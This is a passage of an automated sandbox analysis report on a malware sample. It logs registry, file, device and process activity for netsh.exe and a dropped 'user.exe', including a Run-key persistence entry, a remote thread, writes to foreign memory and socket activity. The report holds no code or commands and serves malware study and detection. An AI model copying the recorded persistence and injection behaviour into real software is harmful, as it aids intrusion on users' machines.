HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\Setup	SystemSetupInProgress	0	1

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\Software\Classes	1	Key Change,Value Change	3
HKLM\Software\Classes\CLSID	1	Key Change,Value Change	2
HKLM\Software\Microsoft\COM3	1	Key Change,Value Change	6
HKLM\Software\Microsoft\Tracing\FWCFG	0	Attributes Change,Value Change,Security Descriptor Change	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1
HKU	1	Key Change,Value Change	3

4.b) netsh.exe - File Activities

	- Files Read:

C:\WINDOWS\Registration\R00000000000f.clb

PIPE\lsarpc

	- Files Modified:

PIPE\lsarpc

WMIDataDevice

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	6

	- Device Control Communication:

File	Control Code	Times
WMIDataDevice	0x0022414C	5
WMIDataDevice	0x00228144	5
unnamed file	0x00390008	7

	- Memory Mapped Files:

File Name

C:\WINDOWS\System32\Wbem\framedyn.dll

C:\WINDOWS\System32\qagent.dll

C:\WINDOWS\WindowsShell.Manifest

C:\WINDOWS\system32\CLBCATQ.DLL

C:\WINDOWS\system32\CLUSAPI.dll

C:\WINDOWS\system32\COMRes.dll

C:\WINDOWS\system32\DGNET.DLL

C:\WINDOWS\system32\DNSAPI.dll

C:\WINDOWS\system32\DOT3CFG.DLL

C:\WINDOWS\system32\FWCFG.DLL

C:\WINDOWS\system32\HNETMON.DLL

C:\WINDOWS\system32\IFMON.DLL

C:\WINDOWS\system32\IPMONTR.DLL

C:\WINDOWS\system32\IPPROMON.DLL

C:\WINDOWS\system32\IPV6MON.DLL

C:\WINDOWS\system32\IPXMONTR.DLL

C:\WINDOWS\system32\IPXPROMN.DLL

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\MSVCP60.dll

C:\WINDOWS\system32\MSWSOCK.dll

C:\WINDOWS\system32\NAPMONTR.DLL

C:\WINDOWS\system32\NTDSAPI.dll

C:\WINDOWS\system32\OneX.DLL

C:\WINDOWS\system32\QUtil.dll

C:\WINDOWS\system32\RASMONTR.DLL

C:\WINDOWS\system32\WINSTA.dll

C:\WINDOWS\system32\WTSAPI32.dll

C:\WINDOWS\system32\credui.dll

C:\WINDOWS\system32\dot3api.dll

C:\WINDOWS\system32\dot3dlg.dll

C:\WINDOWS\system32\eappcfg.dll

C:\WINDOWS\system32\eappprxy.dll

C:\WINDOWS\system32\netcfgx.dll

C:\WINDOWS\system32\netshell.dll

C:\WINDOWS\system32\rpcss.dll

C:\WINDOWS\system32\wbem\fastprox.dll

C:\WINDOWS\system32\wbem\wbemcomn.dll

C:\WINDOWS\system32\wbem\wbemprox.dll

C:\WINDOWS\system32\wbem\wbemsvc.dll

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\xpob2res.dll

C:\WINDOWS\system32\xpsp2res.dll

4.c) netsh.exe - Process Activities

	- Thread Overview:

Time	Number of threads
After 132 seconds	1

4.d) netsh.exe - Other Activities

	- Mutexes Created:

CTF.Asm.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.Compart.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.LBES.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.Layouts.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.TMD.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.TimListCache.FMPDefaultS-1-5-21-1229272821-1004336348-527237240-1003MUTEX.DefaultS-1-5-21-1229272821-1004336348-527237240-1003

	- Windows SEH exceptions:

Description	Times
Exception 0xe06d7363 at 0x7c812aeb	1

5. user.exe

	- General information about this executable

Analysis Reason:	Started by Explorer.EXE
Filename:	user.exe
MD5:	0765a69edaaa5fc1453eda3ec830bbcf
SHA-1:	19460bc79dcd2f16e1f760aaa7eec80918bd93e3
File Size:	23412 Bytes
Command Line:	"C:\Documents and Settings\user\user.exe" /r
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\hnetcfg.dll	0x662B0000	0x00058000
C:\WINDOWS\system32\mswsock.dll	0x71A50000	0x0003F000
C:\WINDOWS\System32\wshtcpip.dll	0x71A90000	0x00008000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000

5.a) user.exe - Registry Activities

	- Registry Values Modified:

Key	Name	New Value
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Run	user	C:\Documents and Settings\user\user.exe /i

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters	Transports	0x5400630070006900700000004e0065007400420049004f00530000000000	2
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	HelperDllName	%SystemRoot%\System32\wshtcpip.dll	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	Mapping	0x0b0000000300000002000000010000000600000002000000010000000000	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MaxSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MinSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	UseDelayedAcceptance	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1

5.b) user.exe - File Activities

	- Files Read:

PIPE\lsarpc

	- Files Modified:

PIPE\lsarpc

\Device\Afd\Endpoint

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	3

	- Device Control Communication:

File	Control Code	Times
\Device\Afd\Endpoint	AFD_GET_INFO (0x0001207B)	2
\Device\Afd\Endpoint	AFD_SET_CONTEXT (0x00012047)	2
\Device\Afd\Endpoint	AFD_BIND (0x00012003)	1
\Device\Afd\Endpoint	AFD_GET_TDI_HANDLES (0x00012037)	1
\Device\Afd\Endpoint	AFD_GET_SOCK_NAME (0x0001202F)	1
\Device\KsecDD	0x00390008	8
\Device\Afd\Endpoint	AFD_SEND_DATAGRAM (0x00012023)	1

	- Memory Mapped Files:

File Name

C:\Documents and Settings\user\user.exe

C:\WINDOWS\System32\wshtcpip.dll

C:\WINDOWS\system32\WS2HELP.dll

C:\WINDOWS\system32\WS2_32.dll

C:\WINDOWS\system32\hnetcfg.dll

C:\WINDOWS\system32\mswsock.dll

5.c) user.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\Documents and Settings\user\user.exe
	C:\Documents and Settings\user\user.exe /r

	- Remote Threads Created:

Affected Process

C:\Documents and Settings\user\user.exe

	- Thread Overview:

Time	Number of threads
After 47 seconds	1

	- Foreign Memory Regions Read:

Process: C:\Documents and Settings\user\user.exe

	- Foreign Memory Regions Written:

Process: C:\Documents and Settings\user\user.exe

5.d) user.exe - Network Activity

6. user.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	user.exe
MD5:	0765a69edaaa5fc1453eda3ec830bbcf
SHA-1:	19460bc79dcd2f16e1f760aaa7eec80918bd93e3
File Size:	23412 Bytes
Command Line:	"C:\Documents and Settings\user\user.exe" /r
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\hnetcfg.dll	0x662B0000	0x00058000
C:\WINDOWS\system32\mswsock.dll	0x71A50000	0x0003F000
C:\WINDOWS\System32\wshtcpip.dll	0x71A90000	0x00008000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000

6.a) user.exe - Registry Activities

	- Registry Values Modified:

Key	Name	New Value
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Run	user	C:\Documents and Settings\user\user.exe /i

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters	Transports	0x5400630070006900700000004e0065007400420049004f00530000000000	2
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	HelperDllName	%SystemRoot%\System32\wshtcpip.dll	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	Mapping	0x0b0000000300000002000000010000000600000002000000010000000000	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MaxSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MinSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	UseDelayedAcceptance	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
